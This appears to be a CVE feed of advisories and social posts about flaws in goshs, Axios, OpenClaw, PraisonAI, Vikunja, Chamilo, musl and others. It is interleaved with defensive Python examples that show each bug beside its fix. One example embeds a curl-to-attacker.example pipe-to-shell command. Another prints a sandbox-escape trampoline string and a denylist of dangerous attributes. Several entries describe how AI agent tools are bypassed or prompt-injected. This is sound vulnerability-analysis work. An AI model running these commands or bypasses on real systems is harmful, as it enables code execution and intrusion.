CVE-2026-40189 (CRITICAL): patrickhener goshs <2.0.0-beta.4 has a missing auth bug — attackers can upload, delete, or remove auth files, exposing protected dirs. Upgrade to 2.0.0-beta.4 ASAP. radar.offseq.com/threat/cve-20

##

offseq at 2026-04-11T00:00:40.142Z ##

🚨 CVE-2026-40189: goshs <2.0.0-beta.4 has a CRITICAL auth bypass. Attackers can upload, delete, and remove folder auth to access protected files. Mitigate by upgrading now! radar.offseq.com/threat/cve-20

##
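
The second goshs entry (CVE-2026-40189) is an authorization gap rather than a path bug: the per-folder `.goshs` ACL/basic-auth check is applied to directory listings and file reads but not to the state-changing routes (PUT, multipart POST upload, `?mkdir`, delete), and the offseq posts add that an attacker can remove the auth file itself. The following is an added example, not goshs's code, of that shape of bug and its fix in a miniature dispatcher: `ACL`, `handle_vulnerable` and `handle_fixed` are constructed names, the credentials stand in for the contents of a `.goshs` file, and the fixed handler both consults the ACL on every method and refuses client writes to the ACL file.

```python
"""Added example (not goshs code): an authorization check that only guards
read routes leaves every write route open. ACL and handlers are constructed."""
import base64
import hmac
import posixpath
from typing import Optional, Tuple

# Constructed per-folder credentials, standing in for a `.goshs` file found
# in that folder. Keys are folder paths as the client sees them.
ACL = {"/private": ("alice", "s3cret")}
ACL_FILENAME = ".goshs"
MUTATING = {"PUT", "POST", "DELETE"}


def acl_for(path: str) -> Optional[Tuple[str, str]]:
    """Return the credentials of the nearest protected ancestor folder, if
    any. Matching is per path component, so '/privateer/x' does not inherit
    the protection of '/private'."""
    path = posixpath.normpath(posixpath.join("/", path))
    while True:
        if path in ACL:
            return ACL[path]
        if path == "/":
            return None
        path = posixpath.dirname(path)


def basic_ok(auth_header: Optional[str], creds: Tuple[str, str]) -> bool:
    """Check an 'Authorization: Basic ...' header against creds in constant time."""
    if not auth_header or not auth_header.startswith("Basic "):
        return False
    try:
        user, _, pw = base64.b64decode(auth_header[6:]).decode().partition(":")
    except ValueError:          # bad base64 or bad UTF-8
        return False
    return (hmac.compare_digest(user.encode(), creds[0].encode())
            and hmac.compare_digest(pw.encode(), creds[1].encode()))


def authorized(path: str, auth_header: Optional[str]) -> bool:
    creds = acl_for(path)
    return creds is None or basic_ok(auth_header, creds)


def handle_vulnerable(method: str, path: str, auth_header: Optional[str] = None) -> int:
    """Mirrors the reported bug: the ACL is consulted only on the read path,
    so PUT/POST/DELETE on a protected folder succeed unauthenticated."""
    if method == "GET" and not authorized(path, auth_header):
        return 401
    return 200


def handle_fixed(method: str, path: str, auth_header: Optional[str] = None) -> int:
    """Every route consults the same ACL, and no client may create, replace
    or delete the ACL file itself, otherwise one authenticated write could
    strip the folder's protection for everyone."""
    if not authorized(path, auth_header):
        return 401
    if method in MUTATING and posixpath.basename(posixpath.normpath(path)) == ACL_FILENAME:
        return 403
    return 200


def basic_header(user: str, pw: str) -> str:
    """Build the header a client would send (constructed helper for tests)."""
    return "Basic " + base64.b64encode(f"{user}:{pw}".encode()).decode()


if __name__ == "__main__":
    print("vulnerable PUT /private/x:", handle_vulnerable("PUT", "/private/x"))
    print("fixed      PUT /private/x:", handle_fixed("PUT", "/private/x"))
```

The practical check for any file server with per-folder ACLs is a matrix test: every route multiplied by every method, asserting that each mutating combination on a protected folder returns 401 without credentials. Treating the ACL file as read-only from the client side is what stops the "remove the auth file" step the offseq posts describe.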

CVE-2026-40175
(10.0 CRITICAL)

EPSS: 0.24%

updated 2026-04-10T20:16:22.800000

2 posts

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0, the Axios library is vulnerable to a specific "Gadget" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0.

thehackerwire@mastodon.social at 2026-04-11T04:01:55.000Z ##

🔴 CVE-2026-40175 - Critical (10)

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0, the Axios library is vulnerable to a specific "Gadget" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code E...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40093
(9.1 CRITICAL)

EPSS: 0.06%

updated 2026-04-10T19:55:04

1 posts

### Impact Block timestamp validation enforces that `timestamp >= parent.timestamp` for non-skip blocks and `timestamp == parent.timestamp + MIN_PRODUCER_TIMEOUT` for skip blocks, but there is no visible upper bound check against the wall clock. A malicious block-producing validator can set block timestamps arbitrarily far in the future. This directly affects reward calculations via `Policy::supp

thehackerwire@mastodon.social at 2026-04-10T07:08:16.000Z ##

🟠 CVE-2026-40093 - High (8.1)

nimiq-blockchain provides persistent block storage for Nimiq's Rust implementation. In 1.3.0 and earlier, block timestamp validation enforces that timestamp >= parent.timestamp for non-skip blocks and timestamp == parent.timestamp + MIN_PRODUCER_T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35641
(8.6 HIGH)

EPSS: 0.01%

updated 2026-04-10T19:45:22

2 posts

> Fixed in OpenClaw 2026.3.24, the current shipping release. ### Summary During the installation phase of OpenClaw local plugins/hooks, the Git executable can be hijacked by a project-level .npmrc file, leading to arbitrary code execution during installation. ### Details Please note that the source code locations mentioned below are based on version openclaw-2026.3.13-1, but the issue has been c

thehackerwire@mastodon.social at 2026-04-11T07:00:48.000Z ##

🟠 CVE-2026-35641 - High (7.8)

OpenClaw before 2026.3.24 contains an arbitrary code execution vulnerability in local plugin and hook installation that allows attackers to execute malicious code by crafting a .npmrc file with a git executable override. During npm install executi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35643
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T19:38:05

4 posts

## Summary Android Canvas WebView pages from untrusted origins could invoke the JavascriptInterface bridge and inject instructions into the app. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected: < 2026.3.22 - Fixed: >= 2026.3.22 - Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`) - Latest published npm version checked: `2026.3.23-2` ##

thehackerwire@mastodon.social at 2026-04-11T07:03:17.000Z ##

🟠 CVE-2026-35643 - High (8.8)

OpenClaw before 2026.3.22 contains an unvalidated WebView JavascriptInterface vulnerability allowing attackers to inject arbitrary instructions. Untrusted pages can invoke the canvas bridge to execute malicious code within the Android application ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-11T07:02:07.000Z ##

🟠 CVE-2026-35643 - High (8.8)

OpenClaw before 2026.3.22 contains an unvalidated WebView JavascriptInterface vulnerability allowing attackers to inject arbitrary instructions. Untrusted pages can invoke the canvas bridge to execute malicious code within the Android application ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35666
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T19:37:45

2 posts

## Summary Allow-always exec approvals did not unwrap /usr/bin/time, so an unregistered time wrapper could bypass executable binding and reuse approval state for the inner command. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected: < 2026.3.22 - Fixed: >= 2026.3.22 - Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`) - Latest published np
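The bypass above comes from binding an allow-always approval to the wrapper rather than to the program the wrapper hands off to. The check below is an added example, not OpenClaw's implementation: it resolves the effective executable through a small wrapper table (`time`, `env`, `nice`, `nohup`; the table and its minimal option lists are the example's assumptions) before comparing it with the approved set, and shows the naive binding to argv[0] beside it.

```python
"""Approval binding for an exec allowlist: naive (bind to argv[0]) beside
unwrapping (bind to the program the wrappers hand off to).
Added example; not OpenClaw's implementation."""
import os
import shlex

# Wrapper program -> options that consume a following argument. Assumed,
# deliberately minimal tables; extend per platform before relying on them.
WRAPPERS = {
    "time": {"-f", "--format", "-o", "--output"},
    "env": set(),          # also accepts VAR=value assignments, handled below
    "nice": {"-n", "--adjustment"},
    "nohup": set(),
}


def effective_argv(argv: list) -> list:
    """Peel leading wrappers and return the argv of the command they run."""
    while argv:
        prog = os.path.basename(argv[0])
        if prog not in WRAPPERS:
            return argv
        takes_arg = WRAPPERS[prog]
        i = 1
        while i < len(argv):
            tok = argv[i]
            if tok == "--":                       # end of wrapper options
                i += 1
                break
            if tok in takes_arg:
                i += 2
            elif tok.startswith("-"):
                i += 1
            elif prog == "env" and "=" in tok:    # env VAR=value ...
                i += 1
            else:
                break                             # first token of the inner command
        argv = argv[i:]
    return argv


def binding_key(command: str, unwrap: bool = True) -> str:
    """Executable name an approval is bound to for this command line."""
    argv = shlex.split(command)
    if unwrap:
        argv = effective_argv(argv)
    return os.path.basename(argv[0]) if argv else ""


def is_allowed(command: str, approved: set, unwrap: bool = True) -> bool:
    """allow-always check: the program that actually runs must be approved."""
    return binding_key(command, unwrap) in approved


if __name__ == "__main__":
    approved = {"time"}   # an earlier allow-always on '/usr/bin/time ls'
    cmd = "/usr/bin/time -f %e bash -c 'curl http://attacker.example/x | sh'"
    print("bind to argv[0]:", is_allowed(cmd, approved, unwrap=False))  # True
    print("bind to inner  :", is_allowed(cmd, approved, unwrap=True))   # False
```

Binding to a basename is enough to show the point; a real approval store should bind to the resolved absolute path of the inner program, and shells (`bash -c`, `sh -c`) deserve their own class, since approving them approves whatever string follows.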

thehackerwire@mastodon.social at 2026-04-11T06:11:20.000Z ##

🟠 CVE-2026-35666 - High (8.8)

OpenClaw before 2026.3.22 contains an allowlist bypass vulnerability in system.run approvals that fails to unwrap /usr/bin/time wrappers. Attackers can bypass executable binding restrictions by using an unregistered time wrapper to reuse approval ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35595
(8.3 HIGH)

EPSS: 0.03%

updated 2026-04-10T19:36:16

2 posts

## Summary A user with Write-level access to a project can escalate their permissions to Admin by moving the project under a project they own. After reparenting, the recursive permission CTE resolves ownership of the new parent as Admin on the moved project. The attacker can then delete the project, manage shares, and remove other users' access. ## Details The `CanUpdate` check at `pkg/models/p
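The escalation above reproduces in an in-memory SQLite model, added here as an example that is not Vikunja's code: the schema, the permission codes (read 0, write 1, admin 2) and the recursive CTE are assumptions standing in for the real ones. The vulnerable rule demands only write on the new parent; the fixed rule additionally demands admin on the project being moved, so a writer cannot re-root someone else's project under one they own.

```python
"""Reparenting privilege escalation modelled in SQLite, vulnerable and fixed.
Added example; schema, permission codes and CTE are assumptions."""
import sqlite3

READ, WRITE, ADMIN = 0, 1, 2

SCHEMA = """
CREATE TABLE projects (
    id INTEGER PRIMARY KEY,
    owner_id INTEGER NOT NULL,
    parent_project_id INTEGER REFERENCES projects(id)
);
CREATE TABLE project_users (
    project_id INTEGER REFERENCES projects(id),
    user_id INTEGER NOT NULL,
    permission INTEGER NOT NULL
);
"""

# Walk from the project up through its ancestors. Owning the project or any
# ancestor yields ADMIN; otherwise the best explicit share along the chain wins.
PERMISSION_SQL = """
WITH RECURSIVE chain(id, owner_id, parent_project_id, depth) AS (
    SELECT id, owner_id, parent_project_id, 0 FROM projects WHERE id = :project
    UNION ALL
    SELECT p.id, p.owner_id, p.parent_project_id, c.depth + 1
      FROM projects p JOIN chain c ON p.id = c.parent_project_id
     WHERE c.depth < 64                       -- guard against parent cycles
)
SELECT MAX(perm) FROM (
    SELECT :admin AS perm FROM chain WHERE owner_id = :user
    UNION ALL
    SELECT pu.permission FROM project_users pu
      JOIN chain c ON pu.project_id = c.id
     WHERE pu.user_id = :user
)
"""


def permission(conn, user, project):
    """Effective permission of user on project, or None if no access."""
    row = conn.execute(PERMISSION_SQL,
                       {"project": project, "user": user, "admin": ADMIN}).fetchone()
    return None if row is None or row[0] is None else row[0]


def move_project(conn, user, project, new_parent, fixed):
    """Set parent_project_id. Vulnerable rule: WRITE on the new parent is enough.
    Fixed rule: the caller must also hold ADMIN on the project being moved."""
    on_parent = permission(conn, user, new_parent)
    if on_parent is None or on_parent < WRITE:
        raise PermissionError("write on new parent required")
    if fixed:
        on_project = permission(conn, user, project)
        if on_project is None or on_project < ADMIN:
            raise PermissionError("admin on the moved project required")
    conn.execute("UPDATE projects SET parent_project_id = ? WHERE id = ?",
                 (new_parent, project))


def scenario(fixed):
    """Attacker (user 2) has WRITE on victim's project 10 and owns project 20.
    Returns the attacker's permission on 10 before and after the move attempt."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    victim, attacker = 1, 2
    conn.execute("INSERT INTO projects VALUES (10, ?, NULL)", (victim,))
    conn.execute("INSERT INTO projects VALUES (20, ?, NULL)", (attacker,))
    conn.execute("INSERT INTO project_users VALUES (10, ?, ?)", (attacker, WRITE))
    before = permission(conn, attacker, 10)
    try:
        move_project(conn, attacker, 10, 20, fixed)
    except PermissionError:
        pass
    return before, permission(conn, attacker, 10)


if __name__ == "__main__":
    print("vulnerable:", scenario(fixed=False))  # (1, 2): writer became admin
    print("fixed     :", scenario(fixed=True))   # (1, 1)
```

The general lesson is that any field whose change alters what an authorization query resolves (here `parent_project_id` feeding an ancestor walk) needs the permission check of the object whose effective rights change, not only of the object being referenced.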

thehackerwire@mastodon.social at 2026-04-11T07:02:14.000Z ##

🟠 CVE-2026-35595 - High (8.3)

Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CanUpdate check at pkg/models/project_permissions.go:139-148 only requires CanWrite on the new parent project when changing parent_project_id. However, Vikunja's p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40163
(8.2 HIGH)

EPSS: 0.08%

updated 2026-04-10T19:30:28

2 posts

### Summary Two unauthenticated path traversal vulnerabilities exist in Saltcorn's mobile sync endpoints. The `POST /sync/offline_changes` endpoint allows an unauthenticated attacker to create arbitrary directories and write a `changes.json` file with attacker-controlled JSON content anywhere on the server filesystem. The `GET /sync/upload_finished` endpoint allows an unauthenticated attacker to

thehackerwire@mastodon.social at 2026-04-11T05:00:29.000Z ##

🟠 CVE-2026-40163 - High (8.2)

Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.5, 1.5.5, and 1.6.0-beta.4, the POST /sync/offline_changes endpoint allows an unauthenticated attacker to create arbitrary directories and write a changes.j...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40156
(7.8 HIGH)

EPSS: 0.02%

updated 2026-04-10T19:26:45

2 posts

PraisonAI automatically loads a file named `tools.py` from the current working directory to discover and register custom agent tools. This loading process uses `importlib.util.spec_from_file_location` and immediately executes module-level code via `spec.loader.exec_module()` **without explicit user consent, validation, or sandboxing**. The `tools.py` file is loaded **implicitly**, even when it is

thehackerwire@mastodon.social at 2026-04-11T06:10:40.000Z ##

🟠 CVE-2026-40156 - High (7.8)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI automatically loads a file named tools.py from the current working directory to discover and register custom agent tools. This loading process uses importlib.util.spec_from_file_...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40158
(8.6 HIGH)

EPSS: 0.03%

updated 2026-04-10T19:25:40

4 posts

PraisonAI's AST-based Python sandbox can be bypassed using `type.__getattribute__` trampoline, allowing arbitrary code execution when running untrusted agent code. ## Description The `_execute_code_direct` function in `praisonaiagents/tools/python_tools.py` uses AST filtering to block dangerous Python attributes like `__subclasses__`, `__globals__`, and `__bases__`. However, the filter only chec
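What the bypass above relies on can be checked without executing anything. The functions below are an added example and not PraisonAI's `_execute_code_direct`: they model a denylist that inspects `ast.Attribute` names, then show that the same name passed as a string argument to `type.__getattribute__` never produces an `ast.Attribute` node and so passes the filter. The blocked-name set is the example's own.

```python
"""Why an AST attribute denylist is not a sandbox. Added example; the filter
below is a model of the pattern described, not PraisonAI's code."""
import ast

# Names a denylist-style filter typically refuses as dotted attributes.
BLOCKED_ATTRS = {"__subclasses__", "__globals__", "__bases__", "__mro__",
                 "__class__", "__dict__", "__builtins__", "__import__"}


def attribute_filter_ok(src: str) -> bool:
    """Denylist as the advisory describes it: reject if any ast.Attribute
    node carries a blocked name. Only dotted access is inspected."""
    tree = ast.parse(src)
    return not any(isinstance(n, ast.Attribute) and n.attr in BLOCKED_ATTRS
                   for n in ast.walk(tree))


def blocked_names_as_strings(src: str) -> list:
    """Blocked names that reach the code as string constants instead, which
    is how getattr(...) or type.__getattribute__(...) receive them."""
    tree = ast.parse(src)
    return [n.value for n in ast.walk(tree)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)
            and n.value in BLOCKED_ATTRS]


def classify(src: str) -> dict:
    """Outcome of the denylist plus the names it would have missed."""
    return {"passes_attribute_filter": attribute_filter_ok(src),
            "blocked_names_as_strings": blocked_names_as_strings(src)}


# Constructed inputs: the direct form the filter catches and the trampoline
# form from the advisory, which reaches the same attribute through a string.
DIRECT = "object.__subclasses__()"
TRAMPOLINE = "type.__getattribute__(object, '__subclasses__')()"

if __name__ == "__main__":
    for label, src in (("direct", DIRECT), ("trampoline", TRAMPOLINE)):
        print(label, classify(src))
```

Adding the string check does not close the gap either: `'__sub' + 'classes__'` is two constants at parse time, and `chr()` or `bytes.decode()` build the name at run time. Untrusted agent code needs a separate process with OS-level restrictions, not a source-level denylist.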

thehackerwire@mastodon.social at 2026-04-11T06:14:02.000Z ##

🟠 CVE-2026-40158 - High (8.6)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI's AST-based Python sandbox can be bypassed using type.__getattribute__ trampoline, allowing arbitrary code execution when running untrusted agent code. The _execute_code_direct f...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-11T06:10:50.000Z ##

🟠 CVE-2026-40158 - High (8.6)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI's AST-based Python sandbox can be bypassed using type.__getattribute__ trampoline, allowing arbitrary code execution when running untrusted agent code. The _execute_code_direct f...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40150
(7.7 HIGH)

EPSS: 0.03%

updated 2026-04-10T19:23:58

1 posts

## Summary The `web_crawl()` function in `praisonaiagents/tools/web_crawl_tools.py` accepts arbitrary URLs from AI agents with zero validation. No scheme allowlisting, hostname/IP blocklisting, or private network checks are applied before fetching. This allows an attacker (or prompt injection in crawled content) to force the agent to fetch cloud metadata endpoints, internal services, or local fil

thehackerwire@mastodon.social at 2026-04-10T05:00:16.000Z ##

🟠 CVE-2026-40150 - High (7.7)

PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, the web_crawl() function in praisonaiagents/tools/web_crawl_tools.py accepts arbitrary URLs from AI agents with zero validation. No scheme allowlisting, hostname/IP blocklisting, or ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40116
(7.5 HIGH)

EPSS: 0.03%

updated 2026-04-10T19:22:52

1 posts

## Summary The `/media-stream` WebSocket endpoint in PraisonAI's call module accepts connections from any client without authentication or Twilio signature validation. Each connection opens an authenticated session to OpenAI's Realtime API using the server's API key. There are no limits on concurrent connections, message rate, or message size, allowing an unauthenticated attacker to exhaust serve

thehackerwire@mastodon.social at 2026-04-10T04:32:44.000Z ##

🟠 CVE-2026-40116 - High (7.5)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, the /media-stream WebSocket endpoint in PraisonAI's call module accepts connections from any client without authentication or Twilio signature validation. Each connection opens an authenti...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40113
(8.4 HIGH)

EPSS: 0.02%

updated 2026-04-10T19:22:37

1 posts

**Summary** deploy.py constructs a single comma-delimited string for the gcloud run deploy --set-env-vars argument by directly interpolating openai_model, openai_key, and openai_base without validating that these values do not contain commas. gcloud uses a comma as the key-value pair separator for --set-env-vars. A comma in any of the three values causes gcloud to parse the trailing text as addit
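A safe way to build that argument, as an added example rather than PraisonAI's deploy.py: gcloud's list-valued flags accept an alternative delimiter written as `^DELIM^` at the start of the value (documented under `gcloud topic escaping`), so the builder validates the variable names and picks a delimiter absent from every value instead of hoping values contain no comma. `gcloud_split` is an assumed model of how the flag is parsed, used only to show the effect; the three variable names are the ones the advisory mentions.

```python
"""Comma injection into gcloud --set-env-vars, naive builder beside a
delimiter-safe one. Added example; not PraisonAI's deploy.py. gcloud_split
is an assumed model of the flag parser, used only to show the effect."""
import re

ENV_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
CANDIDATE_DELIMS = (",", ":", ";", "|", "#", "@", "~")


def naive_set_env_vars(env: dict) -> str:
    """The shape the advisory describes: values interpolated around ','."""
    return ",".join(f"{k}={v}" for k, v in env.items())


def gcloud_split(arg: str) -> dict:
    """Model of gcloud list parsing: '^D^' prefix selects delimiter D, else ','."""
    delim = ","
    if arg.startswith("^"):
        end = arg.index("^", 1)
        delim, arg = arg[1:end], arg[end + 1:]
    pairs = {}
    for item in arg.split(delim):
        key, _, value = item.partition("=")
        pairs[key] = value
    return pairs


def safe_set_env_vars(env: dict) -> str:
    """Validate names, then choose a delimiter that occurs in no value."""
    for key in env:
        if not ENV_NAME.fullmatch(key):
            raise ValueError(f"invalid environment variable name: {key!r}")
    for delim in CANDIDATE_DELIMS:
        if any(delim in str(v) for v in env.values()):
            continue
        body = delim.join(f"{k}={v}" for k, v in env.items())
        return body if delim == "," else f"^{delim}^{body}"
    raise ValueError("no safe delimiter; pass the variables with --env-vars-file")


def deploy_argv(service: str, env: dict) -> list:
    """argv for subprocess.run (no shell), with the env flag built safely."""
    return ["gcloud", "run", "deploy", service,
            "--set-env-vars", safe_set_env_vars(env)]


if __name__ == "__main__":
    env = {"OPENAI_MODEL": "gpt-4o,ALLOW_ALL=1", "OPENAI_KEY": "sk-example",
           "OPENAI_BASE": "https://api.example/v1"}
    print("naive ->", gcloud_split(naive_set_env_vars(env)))   # 4 variables, one injected
    print("safe  ->", gcloud_split(safe_set_env_vars(env)))    # the 3 that were intended
```

Where values are long or arbitrary, `--env-vars-file` with a YAML file avoids delimiter games altogether; either way the command should be an argv list handed to `subprocess.run` without a shell, so shell metacharacters in the same values are not a second problem.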

thehackerwire@mastodon.social at 2026-04-10T05:00:37.000Z ##

🟠 CVE-2026-40113 - High (8.4)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, deploy.py constructs a single comma-delimited string for the gcloud run deploy --set-env-vars argument by directly interpolating openai_model, openai_key, and openai_base without validatin...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-34179
(9.1 CRITICAL)

EPSS: 0.09%

updated 2026-04-10T19:20:52

1 posts

### Summary A restricted TLS certificate user can escalate to cluster admin by changing their certificate type from `client` to `server` via PUT/PATCH to `/1.0/certificates/{fingerprint}`. The non-admin guard and reset block in `doCertificateUpdate` fail to validate or reset the `Type` field, allowing a caller-supplied value to persist to the database. The modified certificate is matched as a ser

offseq@infosec.exchange at 2026-04-09T10:30:26.000Z ##

🚨 CRITICAL: CVE-2026-34179 in Canonical LXD 4.12 – 6.7 enables privilege escalation from restricted TLS cert user to cluster admin (CVSS 9.1). No patch yet — restrict access & monitor API activity. radar.offseq.com/threat/cve-20 #OffSeq #LXD #PrivilegeEscalation #Vuln

##

CVE-2026-33707
(9.4 CRITICAL)

EPSS: 0.07%

updated 2026-04-10T19:16:23.950000

4 posts

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email) with no random component, no expiration, and no rate limiting. An attacker who knows a user's email can compute the reset token and change the victim's password without authentication. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.
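The two token schemes side by side, as an added example that is not Chamilo's code: `legacy_token` is the deterministic sha1(email) the description above refers to, and `ResetTokens` is what a reset flow needs instead, a random token from the OS CSPRNG that is stored only as a hash, bound to the account, single-use and expiring. The in-memory store and the injectable clock are the example's own.

```python
"""Password-reset tokens: the predictable scheme from the advisory beside a
sound one. Added example, not Chamilo LMS code."""
import hashlib
import secrets
import time


def legacy_token(email: str) -> str:
    """sha1(email): no secret, no randomness, so anyone who knows the
    address computes the same token, forever."""
    return hashlib.sha1(email.encode("utf-8")).hexdigest()


class ResetTokens:
    """Random, hashed-at-rest, account-bound, single-use, expiring tokens."""
    TTL_SECONDS = 15 * 60

    def __init__(self, now=time.time):
        self._now = now                  # injectable clock for testing
        self._store = {}                 # sha256(token) -> (user_id, expires_at)

    @staticmethod
    def _key(token: str) -> bytes:
        # Store a hash so a leaked database does not yield usable tokens.
        return hashlib.sha256(token.encode("utf-8")).digest()

    def issue(self, user_id: int) -> str:
        token = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
        self._store[self._key(token)] = (user_id, self._now() + self.TTL_SECONDS)
        return token                               # goes into the e-mail only

    def redeem(self, token: str, user_id: int) -> bool:
        """True once per token, only for the account it was issued to and
        only before it expires; any failed attempt consumes the token."""
        entry = self._store.pop(self._key(token), None)
        if entry is None:
            return False
        issued_to, expires_at = entry
        return issued_to == user_id and self._now() <= expires_at
```

Rate-limit both the request and the redeem endpoints and answer identically whether or not the address exists; with a 256-bit token looked up by its hash, the lookup itself is not a timing concern, which is why no `compare_digest` is needed here.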

thehackerwire@mastodon.social at 2026-04-11T04:49:18.000Z ##

🔴 CVE-2026-33707 - Critical (9.4)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email) with no random component, no expiration, and no rate limiting. An attacker who knows a user's em...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-04-11T03:00:27.000Z ##

🔒 CRITICAL vuln in Chamilo LMS (CVE-2026-33707): Weak password reset lets attackers hijack accounts using only the victim’s email. Affected: <1.11.38, 2.0.0-alpha.1 to <2.0.0-RC.3. Upgrade ASAP! radar.offseq.com/threat/cve-20 #OffSeq #infosec #vuln #Chamilo

##

CVE-2026-40200
(8.2 HIGH)

EPSS: 0.01%

updated 2026-04-10T18:31:28

4 posts

An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory corruption can occur during qsort of very large arrays, due to incorrectly implemented double-word primitives. The number of elements must exceed about seven million, i.e., the 32nd Leonardo number on 32-bit platforms (or the 64th Leonardo number on 64-bit platforms, which is not practical).
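A worked check of the trigger condition, added here and not taken from the musl advisory: musl's qsort is a smoothsort, whose heap sizes are Leonardo numbers (L(0) = L(1) = 1, L(n) = L(n-1) + L(n-2) + 1), and the description puts the threshold past the 32nd on 32-bit targets and past the 64th on 64-bit targets. The functions turn that into an element count and the size the array itself must have, which is what makes the "32-bit only in practice" assessment checkable.

```python
"""Trigger threshold for the musl qsort issue, worked from the Leonardo
numbers the advisory cites. Added example; only evaluates those numbers."""


def leonardo(n: int) -> int:
    """Leonardo numbers: L(0) = L(1) = 1, L(n) = L(n-1) + L(n-2) + 1."""
    a, b = 1, 1
    for _ in range(n):
        a, b = b, a + b + 1
    return a


def min_elements(bits: int) -> int:
    """Smallest element count past the cited Leonardo number: beyond L(32) on
    32-bit targets, beyond L(64) on 64-bit targets."""
    if bits not in (32, 64):
        raise ValueError("bits must be 32 or 64")
    return leonardo(bits) + 1


def min_array_bytes(bits: int, elem_size: int) -> int:
    """Bytes the array itself occupies at that length for one element size."""
    return min_elements(bits) * elem_size


def human(nbytes: float) -> str:
    """Binary-prefixed size for printing."""
    for unit in ("B", "KiB", "MiB", "GiB", "TiB", "PiB"):
        if nbytes < 1024 or unit == "PiB":
            return f"{nbytes:,.1f} {unit}"
        nbytes /= 1024


if __name__ == "__main__":
    for bits in (32, 64):
        for elem in (1, 4, 8):
            print(f"{bits}-bit, {elem}-byte elements: more than {leonardo(bits):,} "
                  f"elements, i.e. at least {human(min_array_bytes(bits, elem))}")
```

On a 32-bit target an array of 4-byte elements needs only about 27 MiB to cross L(32) = 7,049,155, well within an ordinary process; on 64-bit, crossing L(64) = 34,335,360,355,129 means tens of TiB even for 1-byte elements, which is why the advisory calls that case impractical while still recommending the patch for everyone.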

thehackerwire@mastodon.social at 2026-04-11T06:00:20.000Z ##

🟠 CVE-2026-40200 - High (8.1)

An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory corruption can occur during qsort of very large arrays, due to incorrectly implemented double-word primitives. The number of elements must exceed about seven million, i....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

musl@treehouse.systems at 2026-04-10T15:25:41.000Z ##

SECURITY ADVISORY: musl libc up through 1.2.6 (present version) is affected by CVE-2026-40200 affecting qsort with large arrays.

Unless you have a setup with at least tens of terabytes of virtual memory, this does not affect 64-bit systems, only 32-bit ones. But all users should patch.

openwall.com/lists/musl/2026/0

##

CVE-2026-32931
(7.5 HIGH)

EPSS: 0.16%

updated 2026-04-10T18:16:42.430000

2 posts

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an unrestricted file upload vulnerability in the exercise sound upload function allows an authenticated teacher to upload a PHP webshell by spoofing the Content-Type header to audio/mpeg. The uploaded file retains its original .php extension and is placed in a web-accessible directory, enabling Remote Code Execution as t

thehackerwire@mastodon.social at 2026-04-11T05:03:21.000Z ##

🟠 CVE-2026-32931 - High (7.5)

